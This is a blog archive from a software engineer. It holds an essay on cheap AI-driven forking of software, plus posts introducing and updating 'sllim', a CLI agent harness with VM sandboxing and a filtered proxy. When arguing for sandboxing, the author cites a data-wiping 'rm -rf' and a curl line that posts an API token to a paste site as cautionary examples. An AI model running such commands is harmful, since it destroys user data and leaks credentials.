Obvious Observations On AI
Whether you look at Anthropic's C compiler, Omarchy Linux, Rust reimplementation of coreutils or ArtCraft Adobe suite replacement, you can clearly see the emergence of a fundamentally new capability.
But where will it lead?
I think we can anticipate some consequences by considering the capability overhang we have now, without postulating future new capabilities.
The Freedom to Fork Is Now A Superpower.
There are 3 types of intellectual property that must be considered when forking a program: copyright, trademarks, and patents.
- Copyright:
For Open Source projects, you have the option to fork the project directly, just as you always have, subject to the license terms. For cases where the program is proprietary, or the license just has terms you find unacceptable, you'd have to rewrite it from scratch to be free from copyright claims by the authors of the original software. This one may see some novel legal challenges, but the fundamental concept seems sound: Given a target program, use an AI agent to create a detailed software specification, take that specification and give it to another AI agent to implement. And the result is an artificial clean room reimplementation no longer tied to the copyright licensing terms of the original.
- Trademarks:
This is well-trod territory; take Red Hat Enterprise Linux, strip the Red Hat logos and name, and your new Linux distro has its own name and logos. AI agents will help with the tedious work of scraping trademarks off a program, but I don't think this has been a significant roadblock, even before AI agents. AI art might mean a more polished-looking rebranding though.
- Patents:
Patent infringement is not avoided by rewriting the implementation; it is a claim on "how it works", not on "how it was written", and "I came up with it independently" does not invalidate the patent (unless you can show you came up with it before the patent holder, in the US anyway). This is not directly addressed by what we're seeing with AI agents, but we may find that we can give an AI agent a patent, tell it "you must not use this patented technology; find another way to accomplish the goal". I don't think I've seen an example of that yet, but it seems plausible to me that the models available today could achieve that.
Practically speaking, the copyright aspect has been the moat; reimplementing a piece of software was a lot of skilled man hours and thus, expensive. Today, reimplementing a piece of software is a large pile of tokens, and thus, inexpensive. Not free. Maybe not even cheap, if the software is solving a hard problem, but inexpensive by the standards of an engineering payroll.
When the cost to fork drops this much, projects that have had internal squabbling but have been held together by the high cost of reimplementation are going to split. Some of those may fight over which side keeps the trademark, but if one side reimplements, that side will naturally pick a new trademark.
Newly Viable Design Choices
If forking has become that easy, what if we took it too far, and just... forked everything in our Linux distro?
With everything forked, there are a bunch of design decisions we can make that have been practically unavailable for decades.
Look at the number of different programming languages used across any Linux distribution. You have C, C++, bash, Python, Perl, PHP, Lisp, Rust, Node.js, Java, and more. With everything forked, a distro could choose a curated set of languages and different roles for each, and translate all the others to that preferred set of languages. At which point the distro could drop support for other programming languages, along with their toolchains, gain complete consistency across components in the CI/CD pipeline, and easily share common functionality as libraries. I expect you could see significant improvements in memory and storage requirements, and likely performance improvements as well.
Similarly, if everything is already a fork, your selected GUI toolkit need be the only GUI toolkit in the system, and every application gets a native-to-my-toolkit implementation, eliminating cross-toolkit abstraction layers in the code, and gaining consistency in look and feel across the distribution. Once on a consistent GUI toolkit, a distribution could go further, with a common visual design language applied across applications on the system.
Or perhaps it's not the implementation language that you care about, but rather the file formats used. There are so many different configuration file formats used on Linux, each with their own syntactic gotchas. Maybe you like YAML, or perhaps you think XML is just the bee's knees. Translate each program's configuration structure from their snowflake format to, say, JSON so every program's configuration can be checked for correct syntax and programmatically updated.
Or maybe you want every program to emit logs in a specific form. Rather than maintaining glue code to translate a myriad different quirks, update the implementations of everything to all follow your One True Logging Pattern.
Then there are design decisions. I've seen a case where a program (I forget what program) was emitting JSON lines for something else to consume, but not all lines were JSON, and those were to be ignored if they failed to parse as JSON. It should have just used SSE as the protocol and eliminated the ambiguities of the other approach. With every program forked, when you came across such problems, you could set an agent to hunt down all instances of that same bad pattern, and wind up with greater design-level consistency across applications.
Code reuse can become more systematic. How many applications have their own set of "utility functions"? With visibility across the entire distro and language uniformity, those can be evaluated and either promoted into shared libraries for use across the distro, or eliminated because they just add pointless abstractions.
Put another way: A Linux distribution can become a cohesive software project with a deliberately chosen direction rather than a packaging practice.
Alternative Language Forks
But let's look at something smaller scale than an entire distro: individual applications.
Picture this: build a generic system for doing artificial clean room reimplementations.
I would expect to see two sides to this: the analyzer side, and the implementer side. And a documented documentation specification for software specifications (are you following me?) as the defined, one-way communication channel from the analyzer to the implementer. These may look a lot like the RFCs we're used to, but perhaps more exhaustively defined.
The analyzer could have different implementations; one for proprietary binary blobs, another for "source available" programs, a third for SaaS products, and maybe another one for "all we have to work from are YouTube tutorial videos". Set up the analyzer to check for changes in the project it's specifying, and it could even keep up with a moving target.
The implementer side would likely have different flavors for different target implementation languages, GUI toolkits, operating systems, or what-not, potentially making use of LLMs post-trained on the target for greater efficiency. Or perhaps all of that collapses to configuration because it's all similar enough.
Point that system at software to replicate, give it a target to implement for, and feed it tokens. So, so many tokens. That system could end up being nearly autonomous.
Given the creation of that tool, we could see a proliferation of "<project>, but in <language>, with 100% compatibility, under <license|public-domain>" projects. Pick the (program, language, license) triple and a catchy name, spin up the pipeline, paste a website on top with a GitHub/GitLab link, a status page, and a donation link to fund the token budget. The agent runs as long as it has token budget and something from upstream to consume, and the project website shows the token account balance and the task queue, and a pitch for donations: "We're out of tokens, and there's work to be done, won't you buy us some tokens?" or "We're chewing through the work; we estimate we have X hours of tokens left, and Y hours of work in the queue; won't you contribute?" or "We estimate we have X hours of tokens left; we're caught up, but we expect the next release of <project> will need Y hours of tokens; won't you contribute?"
If forking is so easy, why have such a project instead of just doing it yourself? Because a common baseline port would allow people to pool their token budgets on that part of the work. They may fork the resulting project to make further changes, but that fork will require fewer tokens than it otherwise would because it's starting from a baseline that is closer to the goal than the original project was.
Sibling Forks
Shopify announced they are moving to native apps. I wonder if we'll see "sibling projects" where the design documents aim for feature equivalence, the business logic aims for near-convergence, while the GUI code aims to be completely native to that project's GUI toolkit target. Consider the Vim editor; we could see a Qt sibling that replaces the GUI toolkit, but works with vim.org as a peer, to structure both code bases with the aim to converge on the text editing implementation (using agents to keep them from diverging), but diverge in the GUI logic to provide native experiences for the different toolkits. Everything stays friendly, but the cognitive overhead of supporting multiple toolkits in the same code base is largely sidestepped, and new toolkits can join the family using the same tactic without overwhelming the existing siblings.
The Future Of Distributions
Today, Linux distributions consume code from a curated set of upstream projects, apply patches, package, and publish. With the capabilities described above, we might see a new generation of distributions which analyze a curated set of upstream projects or reimplementations of the upstream projects, incorporate them with AI agents into a coherent code base, then package, and publish.
As that becomes more feasible, we may see some interesting patterns of competition emerge as different distributions choose one or two minority positions on various technologies and policies, capturing the segment of the market that strongly cares about those particular issues. A distribution that rejected systemd and Wayland for instance might garner market share based on that pair of decisions, while some other distribution might select KDE as its primary desktop environment and attract a different segment. While that is possible today, a lower barrier to forking reduces the gravitational pull of "everyone is moving to Wayland", and makes the endeavor somewhat less daunting.
But What About Security?
I think security is a subset of the larger category of "quality", and I think we're going to see interesting things happen on that front.
For one, I think we're going to see what happens when getting 100% unit test coverage is just a matter of spending tokens, and getting end-to-end testing is... also just a matter of spending tokens, and integration testing is... also, also just a matter of spending tokens, and security analysis and hardening is... yes, tokens. I expect we'll find that some dimensions of software quality will be very nearly solved, but that there are some aspects for which there is no substitute for "hours spent by humans using the software for real". So while the price of "code" is approaching zero and can be created in little time, the price of "software you can rely on" has a different and slower arc. There are things that have been used as a proxy to gauge the quality and expected longevity of a software project -- such as website polish, look and feel of the app -- which are going to take a back seat to other measures, such as the number of active users, and, I think, age. A new project started last month is a neat, promising tool, but not one you build into a critical path. A project that has been around a while, with a slow tick of patches and releases (rather than the flood of commits seen in early development) is going to command a greater respect.
And that means there remains an incentive for shared codebases; as tokens are poured into a project and users spend hours using it, there is residual value that accumulates in the source code, driving up the token cost to reimplement it. We are going to start measuring moats based on the token cost of a replacement, and the user hours to build trust.
We are in the midst of a tsunami of security vulnerability findings, but I don't think there are an infinite number of security bugs in a distribution. It may be a very large number, but not infinite. I think we will see an increase in the defensiveness of library code as AI agents probe for every possible corner case, and every bug gets treated as a security bug by default. And as that happens, we should find that bugs drain out of our (maintained) systems. And for new functionality, each agent that translates the work into another language, toolkit, or license is another set of eyes that can catch newly introduced bugs. And while each of those agents is also a vector for a bug to get introduced during translation, an agent watching multiple translations for inconsistencies has a great vantage point for catching them.
A proliferation of forks also undermines the tendency toward a monoculture, and thus the fragility inherent in all systems being susceptible to the same exploit. A bit more diversity in our software stacks might provide some resiliency. As for which side of that balance wins in the end though, I'm not ready to place a bet.
Obvious Dangers
If every operating system has its own implementation for email clients, office productivity suites, video-editing software, etc. then every one is going to have different bugs. And, setting security issues aside, that suggests we are going to see a rise in the importance of extremely precise file format definitions that everyone adheres to. We may see projects arise that exist solely to define a single file format and publish test suites to demonstrate compliance or non-compliance of any arbitrary implementation.
Code Negative Space
Agentic translations have an interesting pitfall I haven't seen discussed. The negative space in a code base may be there for a reason. Something won't work, so it isn't in the code, but neither is there something in the code telling you so -- that's "code negative space". Perhaps it is because someone never wrote the comment; or maybe the comment got "cleaned up" during some refactor, or maybe the original author understood the domain well enough that he almost subconsciously avoided the problem. An AI agent translating the code to another language might tread straight into that space and wind up with a real problem in the end. Maybe testing will catch it? I dunno, but I think this is something to watch for.
Economics
So. Many. Tokens. The cost is real. Sure, tokens seem cheap right now, but what they would cost in a world not awash in trillions of dollars in venture capital is hard to nail down. Regardless, they require chips and take power, and a DGX Spark that I bought for $4500 in August is today either 2x that price or simply unobtainium. Meanwhile, the cost in energy is reality; unyielding physics. There remains a lot of room for efficiency gains in multiple dimensions, so cost-for-task is likely to decline for a while yet. But the demand is climbing, and the costs can't actually reach zero.
Conclusion
I think we are going to see some amazing projects from people who have a clear vision of "no, all y'all are wrong; we should do it this other way". And we may get to experience what a coherently designed, consistently implemented, polished Linux distribution can feel like.
I think there is a lot to look forward to here.
Sllim release 0.19
Sllim version 0.19 is available at https://retracile.net/git/sllim.git, and the project page is Sllim.
The small stuff
Sllim now targets Python 3.11 or newer; on Rocky Linux 9, use python3.12. I've added more looping inference detection to catch more ways models (especially heavily quantized variants) wind up spiraling unproductively burning tokens. And there are many bugfixes for bugs found while using the tool and from asking a model to review the code for bugs to fix.
New functionality
And one significant feature: DNF mirror proxying
For profiles configured with a VM-based sandbox, you could configure a whitelist of HTTP operations and sites the agent could access.
But crafting a regex that would allow access to all the Fedora RPM repo mirrors was not viable.
You could create a regex to cover them all, but it would be quite leaky.
In practice, I would have to configure the whitelist with a wildcard entry, run sllim profile sandbox -c "dnf install -y git", and then remove the wildcard.
The obvious problems there include a) forgetting to revert the wildcard, thus allowing the agent unrestricted internet access, and b) having to install tools the agent needs instead of letting the agent figure out what it needed and handle it.
So I added DNF-specific logic to allow requests to the various mirrors while retaining the network filtering.
If you have a profile configured with a (Fedora) VM and filtered networking, you can run
sllim profile update my-profile --dnf-mirror https://mirrors.fedoraproject.org
And then the agent is able to run sudo dnf install -y git (or tesseract, or whatever) as it discovers a need for it.
Details
One feature of DNF that I wanted to preserve was its mirror speed tracking.
In particular, I did not want to have to implement logic to figure out what mirrors work well and which are slow.
After all, dnf already does that.
But that means I couldn't collapse all requests to one hostname: dnf would no longer have visibility into the different mirrors.
Nor did I want to have to try to match every request against all the different potential prefixes.
So instead, I took each mirror in the mirror list, and replaced its base URL with a name like <hash>.dnfmirror.local/.
Then, when a request comes in, dnfmirror.local addresses are handled by the DNF proxy logic, the hash is looked up to find the original base URL, the real URL is constructed, and the connection is made.
Conclusion
I've found that when agents know they can install software via dnf, they'll grab the tools they need that you didn't anticipate, and get the job done.
The tesseract example above was from a real scenario where I was running a text-only model and it needed to extract text from images.
It installed tesseract, extracted the data from the images, and completed the assignment.
Enabling sudo dnf install has been a significant upgrade in Sllim's capabilities.
Sllim, a true CLI AI harness
Yup, this is a post about AI. Wait! Don't run off yet; hear me out.
Discovery
Understanding my background will help you understand why I built Sllim instead of using one of the existing Open Source TUI agent harnesses.
I've been a software engineer for about a quarter of a century now. Survived the dot-com bust. I've worked on a bunch of different kinds of things professionally, and on personal projects. In that work, I tend to gravitate toward building tools for doing software engineering. Some of that gets called DevOps, but some of it is just "rather than do task X, I can create a tool that will do task X correctly, thoroughly, and quickly" and choosing to build the tool.
I'm a CLI kind of guy. My "IDE" is a grid of terminals and gvim windows. I tend to reach for grep rather than some code navigation tool. Yeah, there are drawbacks to that, but I also value understanding the code layout. After all, code is, at heart, a tree of text files.
I've been working with AI for something like a year or so now, trying to wrap my head around every layer, from the matrices to the harnesses.
As you may have heard elsewhere, "something changed" around Thanksgiving / Christmas of 2025. In my case, I saw the first tipping point at Thanksgiving, when I gave an Open Source model a bash tool, and watched it write a full-page Python script, properly escaped to execute in bash, to edit a file... and it worked.
My jaw bounced a few times on the floor.
That was the point where I knew this AI thing was real.
Seeking
Since then, I've been trying to harness that capability in a way that fits my hand.
There are a number of harnesses out there, but none exactly fit what I wanted.
Most of them are not CLIs, despite claiming to be: they're TUIs with their own way of working. I wanted a CLI; a tool that you call from the shell prompt, not a tool that gives you a new prompt with only what it thought to provide within it.
Most seem to take an utterly wrong-headed approach to sandboxing; they look at the command the LLM wants to execute, decide if it's "safe" or not, and then execute it. That doesn't even pass a security sniff test. You want the agent to be able to write test cases, and to run the tests. That means, literally, that you want to let the agent run arbitrary code. Once you face that reality, you realize you must constrain what the agent is able to do. That means scoped access to specific directories, filtered (whitelist-based) access to the internet via proxy, harness code that runs outside the sandbox, and LLM actions that execute inside the sandbox.
Anything short of that eventually results in sudo rm -rf /*. Or curl --data-binary "$OPENAI_TOKEN" https://paste.rs/. Or worse.
I nearly settled for Simon Willison's llm, but I really wanted a file-based data store rather than SQLite. Again, I'm more of a CLI guy, less of an SQL person.
And at some level, I wanted to understand AI harnesses deeply, and there's nothing quite like reinventing a wheel for understanding how wheels work.
Journey
There is a learning curve to working with AI.
Level one: one-shot interaction
Send a prompt, get back a response.
One of the best ROI uses for this is code review. Create a context with 'git diff' with extra context lines, and maybe with the entire file content along with it, plus the task description (such as your Trac or Jira issue content), and instructions on what classes of issues to look for (typos, spelling, bugs, code smells). You will get back a list of concerns. It may include some red herrings where the model got confused, but it will very frequently find problems you missed. Refining your review prompt as you get a feel for the model you use for this will improve the results over time. This is one of those things that benefits noticeably from stronger, more intelligent models.
And that's something worth calling out specifically: Refining prompts over time lets you get better results from LLMs with lower token spend. There is still some level of randomness in model outputs (though that can be reduced, depending on the level of control you have over the inference execution), so I find you wind up "getting a feel for it", but the prompt does matter for both quality and cost.
Level two: continued interaction
Send a prompt, get back a response, add messages to the list, send the updated list, get a response, repeat.
This works really well for design work. Get an initial sketch of a design document, debate pros and cons with the AI, get a solid design document out at the end. Programmers understand the concept of 'rubber ducking' where you explain the problem that has been baffling you all morning, in detail, to an inanimate object... and partway through that process, you can see the solution. With LLMs, we now have 'rubber parroting', where you explain your design to the AI and it actually talks back, giving pros/cons, listing alternatives, reminding you of earlier decisions when you contradict yourself later.
"But what about AI psychosis?" For this to work well, your prompt needs to include instructions such as "Do not flatter.", and "Challenge user assumptions.". In my case, I include a line like "Assume the user has 20 years of professional software development experience.", which seems to materially shift how the model communicates. (Exploring this would be an entire discussion on its own.)
Level three: agentic interaction
Add tool-call support, where tools get called and the updated prompt gets sent back, looping until the LLM stops.
Sub-levels here include a "bash" tool, a recursive "sub-agent" tool, as well as "skills". And there is a lot to understand regarding what actions the LLM is able to take using the tools it is given.
Two things happen at this point. One, your inference costs will naturally skyrocket. Two, you start to shift materially in how you think of doing your job. You begin to shift from "I read and modify code" to "I ask specific questions about the code, and then explain what behavioral change I want made to the code." This is where you hear the term "vibe coding", but you quickly start to think of it as "agentic engineering" and start leaving the text edits and even the commits themselves to the AI.
This is transforming our field. When people talk about software engineers losing their jobs to AI, Patio11 will mention that compilers increased, not decreased, the number of software engineers in the world. I believe this level of AI use is more transformative to this industry than compilers were.
Level four: delegation
Build a goal loop around the agentic interaction, evaluating if a task has been completed or not, and if not, making another attempt.
This is where you get into Karpathy's "autoresearch" concept. The key thing is you write something that can evaluate a result and give either "goal met" or "goal not met". Then you run "level three" over and over until the result evaluates to "goal met". That eval can be something entirely deterministic, such as "performance reaches at least X", or it can itself be a "level three" AI with a set of evaluation criteria to consider, and instructions to render a verdict.
At this point, our work transforms again. You spend your time specifying what "goal met" means and creating the program that can judge between "goal met" and "goal not met". And then you hand that off and let it cook. (And burn tokens. So. Many. Tokens.) While that runs, you can work on defining the next goal. Your work shifts from guiding a code generator to blazing the design path, while the matmuls crunch along inexorably behind you.
We no longer dig basements with shovels; we use excavators. The same thing is coming for software.
Open Questions
- What comes after goal loops?
I'm hearing people talk about "graphs" instead of "loops". Many people are running agents as long-running tasks / daemons which respond to external events. There's talk of creating an artificial software developer with its own access to a project's infrastructure, responding as if it were itself a developer. Others have said they have the agents write the loops instead of writing them directly. Maybe we'll see loops that refine the model's own weights in order to accomplish its tasks. I think this is something that will be hard to predict, but interesting to discover.
- What is the ratio of AI hours to Engineer hours for a given task?
Is AI faster or slower than a human? If a human works 40 hours while an AI works 160, what is the ratio of AI weeks to Engineer weeks for a given task?
- What is the ratio of AI weekly cost to Engineer weekly wage for a given task?
Everyone expects the AI cost to be lower, and it certainly looks that way. But even if it were marginally more expensive, it would still be competitive in many cases due to bursty needs, high uncertainty about the longevity of the business, or even just being an introvert.
- What is the ratio of 'time to define the goal' vs 'time to accomplish the goal'?
IF Engineers spend their time defining the goals, and AI quickly executes those goals: Engineering cost becomes cost of Engineer plus cost of AI inference for that Engineer, with a higher level of output expected for the higher cost.
IF Engineers spend their time defining the goals, and AI crunches on the goal for a long time: Engineering means keeping multiple AI agents running in parallel, and Engineers think about their workload in terms of throughput rather than latency.
IF token prices climb too high, one of the potential trade-offs is to choose the latter scenario, even if AI is able to be fast. Instead of paying per-token prices, self-host and run AI slower, with some shared AI infrastructure like we do for CI/CD infrastructure in companies today. An Engineer submits a defined goal to the queue, and gets results some time later. That lets an organization keep expensive inference hardware running at capacity 24x7 to minimize cost. But even when you're running goals, you're going to want low-latency inference to aid with defining those goals. And then you're looking at priority scheduling in your inference system: prioritize the interactive goal definition work, and fill the rest of the capacity with the goal execution work, expecting the balance to shift with the workforce schedule.
There are other sources of uncertainty here as well:
- How high are hardware component costs going to get?
- Will access to the hardware be restricted?
- Will access to models be restricted?
- What advances will we see in the capability of proprietary models?
- What advances will we see in the capability of Open Source models?
- What advances will we see in the viability of self-hosting of Open Source models?
- How effectively can model routing reduce cost while maintaining quality of output?
It is my hope that advances in self-hosting Open Source models will move us toward a world which looks less like the mainframe era, and more like the era of the PC. Recent advances in getting models like DeepSeek-V4-Flash-0731 to run on a single DGX Spark at useful speeds are particularly encouraging here.
My Octagonal Wheel, sllim
I've always gravitated toward creating tools.
AI promises amazing tools.
So I built sllim.
(Logo graphic design by Kaitlyn Carter.)
sllim is a CLI, not a TUI, for working with AI.
It's an octagonal wheel, on its way to nonagonality, but it has a combination of features I haven't seen elsewhere.
In particular:
- Each "level" of AI interaction is supported:
sllim askis entirely non-agentic, single-response interaction with the LLM.sllim actis agentic, with tools for running commands and launching sub-agents.sllim goalwraps theactfunctionality in a loop with an evaluation command before each attempt.
- CLI, not TUI. It is built to fit into what you're doing on the command line, so you can easily feed files and command output into it, and get back output you can feed into other tools. But it also streams the output as it comes in, including showing tool calls getting built up token-by-token.
- Multiple sandboxing options.
hostto run commands locally without a sandbox. This is what most tools I've seen do. Dangerous.remoteto run commands via ssh on some remote machine, such as if you want to give the LLM full control of a VM in the cloud, or some dedicated machine on your network.containerto run commands within a local (podman) container, with volume mounts specifically configured to grant (possibly read-only) access to directories on the host, with control over host, bridged, or no network access.vmto run the agent's commands within a local VM, with virtfs-based access to specifically configured directories on the host, with control over host, filtered, or no network access. The filtered network access is built around a network proxy with a whitelist of HTTP verb and URL regexes, letting you grant access to specific URLs on the internet, ensuring that the LLM can't go roving freely over the wild and woolly internet.
- Transparent; while most tools give you a spinner,
sllimstreams results so you can see exactly what is going on. Tool-calls don't sit there showing nothing -- instead, you see the command stream in, then see the final command to be run, then see the command output stream in. There's something about watching the data stream in that gives you a real feel for what these systems can do. - Logging everything to text data file formats including YAML, JSON, and JSONL. This is building a pile of data I can mine in the future so I can draw from real data to create test cases for handling API responses, or for debugging them. It's also accumulating conversation histories that one day may be useful for post-training model variants of my own. For instance, given the stored history of a
goalthat ran to successful completion, I think there will be value in taking that history, removing the mistakes that the model made, and feeding that back into the model so that over time it can gradually improve. - Practical necessities, such as loop detection and recovery.
But this isn't a round wheel; as I said, it's octagonal still, with lots of rough corners:
replayis non-functionaleditdoesn't really work well;acthas superseded that in practice for me, but I think it has value for completeness and providing a non-agentic mechanism for file editing.- I've been almost exclusively using fireworks.ai as my inference provider, so the generic OpenAI and Ollama support has less mileage on it.
- I've been using GLM-5 through GLM-5.2 for the vast majority of the development; other models ought to work, but different models do behave differently, so there may be surprises with other models.
- Probably 99% of this code was written by GLM, and I've not reviewed it line-by-line. I'm sure it needs refactoring. I suspect there are Eldritch horrors lurking in this code. Some may even be bad enough I'll be embarrassed by them. But my plan is to learn from them and find ways to raise the quality bar of the AI-generated code. Because that's now something we can do. We can turn our standards for quality into AI-backed programs.
- Sandbox setup has some manual setup to get the environment ready for the AI to be productive. In particular, you'll want to spin up the VM and install the "obvious" software the agent will need to get started. And depending on what directories you mapped into the VM, you may need to fix up directory ownership so ~/.config and ~/.local are usable.
- I'm running this under Fedora 44 and Python 3, with Fedora 44 containers and VMs. Who knows, it might work with other distros too.
- Profile whitelist setup is awkward, but with export/import to a YAML representation, you have the ability to bring scripting to bear on it if needed.
- That filtering proxy needs some custom logic for handling Fedora's yum/dnf mirrors, and would benefit from caching.
- Though I have tried to make the CLI commands follow a consistent structure, some pieces still err too far towards "powerful" on the "powerful vs usable" spectrum. (
sllim history showin particular.)
Quick-start guide
Ok, maybe not so "quick". Octagons make for a rough ride.
Build and install:
git clone https://retracile.net/git/sllim.git cd sllim ./run-all cp output/sllim ~/bin/sllim
Configure the provider:
read -s KEY
sllim provider create --type fireworksai --api-key "$KEY" fireworksai
sllim provider list
sllim model available --provider fireworksai
sllim provider update --add-model '*/glm-5*' \
--cost-cached 0.140 --cost-prompt 1.400 --cost-output 4.400 \
fireworksai
Configure a model config:
sllim model-config create --provider fireworksai --model '*/glm-5*' fw-glm sllim model-config list
This is enough to ask a question:
sllim ask --model-config fw-glm "This is just a test; say 'hi'."
Configure an agentic profile:
mkdir ~/agent-workspace
url="https://mirror.servaxnet.com/fedora/linux/releases/44/Cloud/x86_64/\
images/Fedora-Cloud-Base-Generic-44-1.7.x86_64.qcow2"
sllim profile create \
--model-config fw-glm \
--sandbox-type vm \
--os-variant fedora43 \
--base "$url" \
--network filtered \
--add-vol "$HOME/agent-workspace:$HOME/agent-workspace" \
--max-recursion 2 \
--yolo \
agent
sllim profile show agent
Prep the sandbox:
sllim profile whitelist \
--add \
--url '.*' \
agent
cd ~/agent-workspace
sllim profile sandbox \
--command "sudo chown $USER:$USER $HOME &&
sudo dnf update -y &&
sudo dnf group install -y development-tools" \
agent
sllim profile whitelist \
--rm \
--url '.*' \
agent
sllim profile whitelist --add --domain duckduckgo.com agent
Demonstrate the agent can make tool calls:
cd ~/agent-workspace sllim act --profile agent "What time is it?"
Which gives output like:
[depth 0] Starting new conversation 3299: [depth 0] Sending prompt... (0.6s latency) The user is asking for the current time. I can get this by running a simple shell command. [depth 0] {"id":"chatcmpl-tool-a3b6e5045531acba","function":{"name":"run_shell_command","arguments":{"command":"date"}}} [depth 0] Model indicated it was done. [depth 0] Tokens: 0 cached, 542 prompt, 33 output; cumulative tokens 0 cached, 542 prompt, 33 output; 0.6s+0.8s; 935.5t/s+38.8t/s; +$0.00=$0.00. [depth 0] Calling run_shell_command({'command': 'date'}) Starting VM agent... Started proxy on port 20007 Sat Aug 8 19:38:11 UTC 2026 [depth 0] Result was: command: date exit_code: 0 stdout: ``` Sat Aug 8 19:38:11 UTC 2026 ``` stderr: ``` ``` [depth 0] Sending prompt... (1.2s latency) The current time is Sat Aug 8 19:38:11 UTC 2026. The current time is **Saturday, August 8, 2026, at 19:38 UTC**. [depth 0] Model indicated it was done. [depth 0] Tokens: 541 cached, 79 prompt, 44 output; cumulative tokens 541 cached, 621 prompt, 77 output; 1.8s+1.2s; 640.4t/s+66.0t/s; +$0.00=$0.00. [depth 0] Completed conversation 3299. Stopped proxy Shutting down VM agent... VM agent shut down. Conversation saved: 3299
Conclusion
The code is available under the MIT license.
I've found it extremely powerful, and I'm certain I've only scratched the surface of what can be done with this sort of tool.
The experience of bootstrapping sllim to the point where I could start using sllim to write sllim has been interesting, to say the least.
It has given me an appreciation for what AI tools are capable of, and has changed how I think about software development.
And I expect that will continue.
I've spent a few hundred dollars on inference on this project, paying Fireworks AI's serverless API rates.
Being aware of roughly how much I was spending was very useful feedback, both in terms of how quickly you can spend money on AI, and yet also how cheaply you can implement functionality using it.
I have a lot of improvements I want to make to sllim as time allows, especially in terms of making it easier to get started with it.
The project page is Sllim. If you find this tool useful, I'd love to hear about it. When you run into bugs, drop me an email.
LDraw Parts Library 2026-04 - Packaged for Linux
LDraw.org maintains a library of Lego part models upon which a number of related tools such as LeoCAD, LDView and LPub rely.
I packaged the 2026-04 parts library for Fedora 43 to install to /usr/share/ldraw; it should be straight-forward to adapt to other distributions.
The *.noarch.rpm files are the ones to install, and the .src.rpm contains everything so it can be rebuilt for another rpm-based distribution.
ldraw_parts-202604-ec1.fc43.src.rpm
ldraw_parts-202604-ec1.fc43.noarch.rpm
ldraw_parts-creativecommons-202604-ec1.fc43.noarch.rpm
ldraw_parts-models-202604-ec1.fc43.noarch.rpm
See also LDrawPartsLibrary.
LDraw Parts Library 2026-01 - Packaged for Linux
LDraw.org maintains a library of Lego part models upon which a number of related tools such as LeoCAD, LDView and LPub rely.
I packaged the 2026-01 parts library for Fedora 43 to install to /usr/share/ldraw; it should be straight-forward to adapt to other distributions.
The *.noarch.rpm files are the ones to install, and the .src.rpm contains everything so it can be rebuilt for another rpm-based distribution.
ldraw_parts-202601-ec1.fc43.src.rpm
ldraw_parts-202601-ec1.fc43.noarch.rpm
ldraw_parts-creativecommons-202601-ec1.fc43.noarch.rpm
ldraw_parts-models-202601-ec1.fc43.noarch.rpm
See also LDrawPartsLibrary.
LDraw Parts Library 2025-12 - Packaged for Linux
LDraw.org maintains a library of Lego part models upon which a number of related tools such as LeoCAD, LDView and LPub rely.
I packaged the 2025-12 parts library for Fedora 43 to install to /usr/share/ldraw; it should be straight-forward to adapt to other distributions.
The *.noarch.rpm files are the ones to install, and the .src.rpm contains everything so it can be rebuilt for another rpm-based distribution.
ldraw_parts-202512-ec1.fc43.src.rpm
ldraw_parts-202512-ec1.fc43.noarch.rpm
ldraw_parts-creativecommons-202512-ec1.fc43.noarch.rpm
ldraw_parts-models-202512-ec1.fc43.noarch.rpm
See also LDrawPartsLibrary.
LeoCAD 25.09 - Packaged for Linux
LeoCAD is a CAD application for building digital models with Lego-compatible parts drawn from the LDraw parts library.
I packaged (as an rpm) the 25.09 release of LeoCAD for Fedora 43. This package requires the LDraw parts library package.
Install the binary rpm. The source rpm contains the files to allow you to rebuild the packge for another distribution.
Yet Another Raspberry-Pi case in OpenSCAD
I needed a case for a Raspberry Pi 4B for a project, looked at those available in the usual places, and didn't find something that quite met my needs. I wanted a case which I could bolt to a sheet of plywood, so I wanted holes for a pair of 8-32 heat-set threaded inserts in the lid. I also wanted it to be well-ventilated to avoid overheating.
So I created one (from scratch) in OpenSCAD:
I think it turned out quite well:
And the two parts of the case snap together securely:
For those who would want to make use of it (CC BY-SA), the OpenSCAD and STL files are available in this archive. If you do make use of it, I'd love to hear from you.
(Photography by Joshua Carter.)
LDraw Parts Library 2025-09 - Packaged for Linux
LDraw.org maintains a library of Lego part models upon which a number of related tools such as LeoCAD, LDView and LPub rely.
I packaged the 2025-09 parts library for Fedora 42 to install to /usr/share/ldraw; it should be straight-forward to adapt to other distributions.
The *.noarch.rpm files are the ones to install, and the .src.rpm contains everything so it can be rebuilt for another rpm-based distribution.
ldraw_parts-202509-ec1.fc42.src.rpm
ldraw_parts-202509-ec1.fc42.noarch.rpm
ldraw_parts-creativecommons-202509-ec1.fc42.noarch.rpm
ldraw_parts-models-202509-ec1.fc42.noarch.rpm
See also LDrawPartsLibrary.
LDraw Parts Library 2025-08 - Packaged for Linux
LDraw.org maintains a library of Lego part models upon which a number of related tools such as LeoCAD, LDView and LPub rely.
I packaged the 2025-08 parts library for Fedora 42 to install to /usr/share/ldraw; it should be straight-forward to adapt to other distributions.
The *.noarch.rpm files are the ones to install, and the .src.rpm contains everything so it can be rebuilt for another rpm-based distribution.
ldraw_parts-202508-ec1.fc42.src.rpm
ldraw_parts-202508-ec1.fc42.noarch.rpm
ldraw_parts-creativecommons-202508-ec1.fc42.noarch.rpm
ldraw_parts-models-202508-ec1.fc42.noarch.rpm
See also LDrawPartsLibrary.

rss



